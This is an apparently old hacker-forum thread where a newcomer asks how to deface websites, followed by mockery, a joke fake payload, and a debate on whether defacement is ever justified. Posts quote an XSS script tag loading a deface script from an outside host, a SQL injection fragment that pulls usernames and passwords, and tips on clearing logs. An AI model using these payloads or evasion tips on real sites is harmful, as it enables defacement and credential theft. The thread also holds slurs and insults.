| Author | website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
I need some guidance on what the best "technique" or attack method is the most efficient when trying to deface a website? XSS perhaps
|
 |
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
I have a feeling you are gonna get flamed.....
If I was less lazy you'd be on the grill already.
|
|
|
| Author | RE: website defacement |
clone4
Member
Posts: 586
Location: He is back and he's bad!
Joined: 25.11.07
Rank: Mad User | |
best technique = exploit vulnerabilities that you find...
Oh and almost forgot; Fuck off ! 
[img][/img]
spyware - "They see me trollin'..."
<yaragn> ever seen that movie? The Matrix?
<yaragn> with those green lines of flying text?
<yaragn> *THAT'S* Perl
|
 |
| Author | RE: website defacement |
spyware
Member
Posts: 4192
Location:
Joined: 14.04.07
Rank: God
Warn Level: 90
| |
Enter this in your URLbar, it's an old XSS technique to overflow the site and get root (=admin).
Code javascript:while(1){alert(/get_root/)};
Copy that exactly, it'll take a few minutes though, should be like 10 minutes.
Edit: Guys, don't be so mean to the new guy. Even if he knows nothing now, that doesn't mean he has to be a complete failure in the future...
"The chowner of property." - Zeph [small]�Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.� - Carl Sagan [center]�Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?� - Ebert[/ce
Edited by spyware on 21-08-08 21:25 |
|
|
| Author | RE: website defacement |
Futility
Member
Posts: 760
Location: USA
Joined: 17.12.07
Rank: God | |
tuchezviper wrote:
I need some guidance on what the best "technique" or attack method is the most efficient when trying to deface a website? XSS perhaps
You sir, are an idiot.
Why would you ask a question you already knew the answer to? XSS is positively the best way to hack a site because no one knows about it and it's extremely hard to patch. If you can find a site with an XSS hole in it, you're practically guaranteed to get a nice hack in that everyone here will be proud of. You're on the right track. Keep up the good work! You're obviously going to be a great addition to this prestigious community.
|
 |
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
spyware wrote:
Edit: Guys, don't be so mean to the new guy. Even if he knows nothing now, that doesn't mean he has to be a complete failure in the future...
I agree.I mean after all this is a place where we are supposed to learn and practice besides we don't know if doing this can give him a self esteem crisis |
|
|
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
I really love how spyware and Futility really want to reach out and help the newbies. It's really inspiring to know that we really have great people on this site *sheds a tear and starts to clap*
|
|
|
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
Edit: Guys, don't be so mean to the new guy. Even if he knows nothing now, that doesn't mean he has to be a complete failure in the future...
Then what was that you pulled on me on the other topic? |
|
|
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
| You should take that hacker symbol out of your sig, skid. You obviously don't understand what it means. |
|
|
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
Personally I think that defacing a site is lame! ESPECIALLY with xss i mean common how hard is it <scirpt src=http://site.com/xss_deface.js></script> see its lame! Also What is the point of a deface so you can advertise that you were smart enough to get into sencitave areas of a site? Excuse me if im wrong BUT DOSENT THAT NORMALLY THROW UP RED FLAGS? (Ill always laugh at idiots who deface and dont clear the logs or use a proxy)
Moral of the story. Dont be GAY!
|
|
|
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
exidous wrote:
Personally I think that defacing a site is lame! ESPECIALLY with xss i mean common how hard is it <scirpt src=http://site.com/xss_deface.js></script> see its lame! Also What is the point of a deface so you can advertise that you were smart enough to get into sencitave areas of a site? Excuse me if im wrong BUT DOSENT THAT NORMALLY THROW UP RED FLAGS? (Ill always laugh at idiots who deface and dont clear the logs or use a proxy)
Moral of the story. Dont be GAY!
And yet, people bitch every day saying that hackers are no good little punks with not morals or common decency.
.... hmm....
Good to know people that can barely talk properly are wrong about hackers.
{also, I like this moral, but that doesn't mean i've learned from it}
|
|
|
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
This is neither condoning, or excusing website defacement simply an argument for you to ponder.
Why does a defacer always have to be a skid?
The best hackers in the world are more then capable of defacing website. Im not saying that they do, but definetly can. And if they did so would that then make them a skid?
Sure skids do often deface websites, by looking for the latest vulnerability and searching the web until they find one.
So my argument is simply you cannot nessisarily judge a skid by the act of defacement, only in the way in which the defacement was achieved.
Edited by on 22-08-08 22:42 |
|
|
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
I almost bet you 60% of defacers use MILWORM *that is leaving brown skiddy marks in the internets underwear!*
|
|
|
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
exidous wrote:
I almost bet you 60% of defacers use MILWORM *that is leaving brown skiddy marks in the internets underwear!*
I would say more then that percentage and agree with you, still doesnt change my argument. Also, milw0rm is a great collection of vulnerabilites, and to never use is just taking a valuable resource and throwing it away.
|
|
|
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
exidous wrote:
I almost bet you 60% of defacers use MILWORM *that is leaving brown skiddy marks in the internets underwear!*
You aren't really a skiddy if you understand what the exploit does. And, also, defacing could be used as a way to alert administrators about vulnerabilities, If you e-mail them multiple times, the vulnerability is still there, you are obviously going to fix the vulnerability for them. But, if it's their code, how do you stop them from making the same mistake in a different place? They aren't replying to emails. You either leave a note on their server or you change the homepage. Either way it would be considered defacing. |
|
|
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
I think your twisting what I say. Milworm is a good resource. But think of the people that think there 1337 because they get a google dork. and then they can copy paste (claim the fame) OH man thats 1337. I have met many people that use milworm just to look cool, Post defaces, And claim the fame!
They have no clue what the exploit does how it works or even why it does. Example select concat(user,0x3a,password) from phpbb_users--
Ok so how did they come to find that table phpbb_users exists? Did they enumerate the tables? No! Can they enumerate the tables, probably not!
Same for the columns How did they come to find that there is a column user and password? Did they enumerate those, NO! They got the WHOLE INJECTION FROM MILWORM! And thats just not 1337 its skiddy. Because they actully have no clue how to do what someone else has given them. And they think there "Hackers". And thats just one example. I can give many more. Hell go to milworm and have a look. Tell me how 1337 you would be if you just took someone eleses work and clamed it as yours?
Maby thats the problem with todays "Hackers" they all want someone else to do the work for them so they can claim it. No effort on learning the exploit inside and out.
Now dont get me wrong I go to milworm at times. But I go there looking to learn something new. Then understand how and why it works. So I can do the same thing that the author of the exploit did, With my own techniques and efforts. Not some copy paste skid terd!
|
|
|
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
hacker2k wrote:
You aren't really a skiddy if you understand what the exploit does. And, also, defacing could be used as a way to alert administrators about vulnerabilities, If you e-mail them multiple times, the vulnerability is still there, you are obviously going to fix the vulnerability for them. But, if it's their code, how do you stop them from making the same mistake in a different place? They aren't replying to emails. You either leave a note on their server or you change the homepage. Either way it would be considered defacing.
And here's the thing, its not your responsibility to fix the code for them. If they don't respond to emails that you send them, they don't have to. You're not in charge of their actions. If they choose not to respond, who are you to punish them? |
|
|
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
| It's not punishment. You fixed their vulnerability and the site is defaced for a few minutes. Just make a backup and link to the backup so that people that need the site can still get to it. You emailed them exactly what the vulnerability was so they know what not to do anymore. As far as I'm concerned, it's a service that they are getting for free. |
|
|
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
yes because skid who defaces creates a backup and links to it
its not a service dont try and fool yourself
people deface sites for nothing more then an ego boost and to show off how l337 they are
Edited by on 23-08-08 14:50 |
|
|
| Author | RE: website defacement |
Member
Posts:
Location:
Joined: 01.01.70
Rank: Guest | |
tch0rt wrote:
yes because skid who defaces creates a backup and links to it
Skid's are the ones you scare to death by threatening to prosecute so that you get rid of an 31337-retard  . They're there for entertainment. Also, if skid defaces your site, you don't deserve to have a site.
As for the service thing, the only people that try to get an ego boost are skids. Skids don't gain anything for using a script to deface a website (except to their u83r 1337 friends).
Edited by on 23-08-08 14:58 |
|
|
